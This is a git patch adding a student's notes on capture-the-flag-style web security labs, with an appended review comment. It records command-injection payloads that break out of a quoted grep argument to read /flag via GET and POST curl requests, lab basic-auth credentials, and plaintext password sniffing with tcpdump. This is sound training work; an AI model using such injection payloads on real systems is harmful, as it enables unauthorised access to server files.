From c39c5bb862a31049eb0cd9ebbe17f1f1d87ef471 Mon Sep 17 00:00:00 2001 From: Kaushik Narayan R Date: Fri, 22 Nov 2024 11:46:48 -0700 Subject: [PATCH] moving into project 5 - lab 5a --- Dojo Notes.md | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) diff --git a/Dojo Notes.md b/Dojo Notes.md index 3281977..601fd75 100644 --- a/Dojo Notes.md +++ b/Dojo Notes.md @@ -543,3 +543,30 @@ done ### lab 4d.3 - off by one pivot honestly idk just check class vid and script + +### lab 5a.1 - get command injection + +- unsanitized url query param as grep input +- string is in double quotes +- `curl 'http://lab.localhost?username=pwn.*"+"/flag'` + - double quotes to break the string input + - `+` to insert space after name in grep + - add target path to search in + +### lab 5a.2 - post command injection + +- similar, except post request this time +- string is in single quotes +- `curl -X POST 'http://lab.localhost' -d "username=pwn.*'+'/flag"` + +### lab 5a.3 - basic authentication + +- basic auth, creds in source code +- format: `:` and it has to be base64 encoded +- `curl 'http://lab.localhost' -H "Authorization: Basic $(printf "0c001:acidburn" | base64)"` +- or easier: `curl 'http://lab.localhost' -u "0c001:acidburn"` + +### lab 5a.4 - session hijack + +- not really session hijack, flag is the password, sent in plaintext +- tcpdump access given, done
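Review bot: the lab 5a.1 and 5a.2 bullets never state the server-side command that the `username` value lands in, so the quote-break and `+` tricks are not reproducible from the notes alone; add the command template (something like `grep "<username>" <file>` for 5a.1 and the single-quoted equivalent for 5a.2) above each curl line so the reader can see why the payload becomes `"pwn.*" "/flag"` after the break-out. The `+` bullet should also say that the space comes from URL/form decoding on the server, not from the shell, which is why the same `+` works in the GET query string and in the `-d` form body. In lab 5a.3 the `printf "0c001:acidburn" | base64` pipe is correct only because `printf` emits no trailing newline; note that `echo` would base64 a newline into the token and break the header. The lab 5a.4 entry "tcpdump access given, done" records nothing reusable; at minimum note the capture filter used and where in the capture the password appeared, matching the detail level of the other entries.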